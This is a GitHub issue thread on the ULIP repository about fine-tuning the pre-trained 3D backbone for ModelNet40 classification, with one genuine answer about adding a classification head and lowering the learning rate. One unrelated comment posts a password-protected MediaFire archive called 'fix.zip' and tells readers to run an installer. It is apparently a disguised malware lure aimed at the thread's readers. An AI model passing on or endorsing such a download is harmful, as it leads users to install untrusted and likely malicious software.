### ISSUE TITLE
Question: about how to fine-tune ulip to realize modelnet40 classification (not zero-shot classification)

### ISSUE THREAD

**Issue by xzExertion** [salesforce/ULIP#65]
Dear Dr, 
I am very interested in your work,  but I have a question about fine-tuning the 3d  backbone on modelnet40 classification.  can you give me more explanation? thank you very much!!!!!!!!!
![image](https://github.com/user-attachments/assets/27c1f76d-9d48-40bd-a0c9-e9daf27b6f7e)
![微信图片_20240826161940](https://github.com/user-attachments/assets/3a3d0683-12a7-40d3-b7c5-a2e9cfa7b233)

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tycho-Xue** [comment]
Yeah, just initialize the model with ULIP pre-trained weights and possibly add the classification head. empirically I found that you need to lower the lr to get the optimal performance compared training from scratch, which makes sense since the model has been pre-trained and gained some knowledge.
